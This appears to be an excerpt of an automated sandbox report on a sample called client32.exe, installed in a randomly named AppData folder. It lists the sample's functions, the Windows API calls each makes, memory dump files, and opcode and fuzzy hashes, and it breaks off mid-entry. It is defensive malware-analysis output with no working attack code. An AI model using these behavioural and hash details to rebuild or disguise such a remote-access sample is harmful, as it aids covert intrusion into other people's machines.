                                                                                • Instruction Fuzzy Hash: 2A51CF75E04685DFE322CF64C884B96FBE2EF04314F058199E8A98B281D770BD44CB90
                                                                                Function 11030DA7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                • String ID:
                                                                                • API String ID: 1314093303-0
                                                                                • Opcode ID: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                • Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
                                                                                • Opcode Fuzzy Hash: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                • Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40
                                                                                Function 111447F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                Strings
                                                                                • C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe, xrefs: 11144804, 11144812
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentFileModuleNameProcess
                                                                                • String ID: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe
                                                                                • API String ID: 2251294070-680890208
                                                                                • Opcode ID: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                                • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                                • Opcode Fuzzy Hash: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                                • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                                Function 11110230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 11110239
                                                                                  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                • _memset.LIBCMT ref: 11110262
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                • String ID: ..\ctl32\Refcount.cpp
                                                                                • API String ID: 2803934178-2363596943
                                                                                • Opcode ID: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                                • Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
                                                                                • Opcode Fuzzy Hash: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                                • Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6
                                                                                Function 11015580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102F66A,MiniDumpType,000000FF,00000000,00000000), ref: 11015597
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,View,Client,Bridge), ref: 110155A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle
                                                                                • String ID: \\.\NSWFPDrv
                                                                                • API String ID: 3498533004-85019792
                                                                                • Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                • Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
                                                                                • Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                • Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
                                                                                Function 1115CCA0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _calloc
                                                                                • String ID:
                                                                                • API String ID: 1679841372-0
                                                                                • Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                • Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
                                                                                • Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                • Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90
                                                                                Function 11112140 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                • __wsplitpath.LIBCMT ref: 11112185
                                                                                  • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                • String ID:
                                                                                • API String ID: 1847508633-0
                                                                                • Opcode ID: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                                • Instruction ID: c591a5ba9c17bf4ee1841d59d592da31fd18a085fce33aa04bf57df4da238aa2
                                                                                • Opcode Fuzzy Hash: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                                • Instruction Fuzzy Hash: E4116175A4020CABEB14DF94CD42FE9F778AB48B04F5041D8E6246B1C0E7B02A48CBA5
                                                                                Function 1109EE00 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
                                                                                  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                  • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                  • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,00F9F4D8,?,00000001,00000001), ref: 1109EDC3
                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                • String ID:
                                                                                • API String ID: 2256153495-0
                                                                                • Opcode ID: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                                • Instruction ID: 92f2080e931b07f8e3ae21524f42d2d018667502f077eef341ad82fca5e9a749
                                                                                • Opcode Fuzzy Hash: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                                • Instruction Fuzzy Hash: C8F05E74A01328EFDB08CFE5D99482EB7B8AF08748B40487DE429C3208D632DE00DF50
                                                                                Function 11110430 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(111F1908,1B702977,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
                                                                                • EnterCriticalSection.KERNEL32(111F1908,1B702977,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
                                                                                • LeaveCriticalSection.KERNEL32(111F1908,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterInitializeLeave
                                                                                • String ID:
                                                                                • API String ID: 3991485460-0
                                                                                • Opcode ID: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                                • Instruction ID: 9bba9b476bfc0c868cb30dd48e950e81aed48164d9983b9afed5b510859fa25d
                                                                                • Opcode Fuzzy Hash: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                                • Instruction Fuzzy Hash: A8118671B4061AAFE7008FA6CDC4B9AF7A8FB4A755F404239E815A7B44E7355804CBE0
                                                                                Function 11069480 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11069542
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: ??CTL32.DLL
                                                                                • API String ID: 1029625771-2984404022
                                                                                • Opcode ID: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                • Instruction ID: 80b6f585093910a847ce346e7da9e0444a9b2d99666d64fa09b423d85774157b
                                                                                • Opcode Fuzzy Hash: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                • Instruction Fuzzy Hash: 9331CF75A046519FE711CF58DC40BAAFBE8FF46724F0482AAE9199B780F771A800CB91
                                                                                Function 110271A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DriveType
                                                                                • String ID: ?:\
                                                                                • API String ID: 338552980-2533537817
                                                                                • Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                • Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
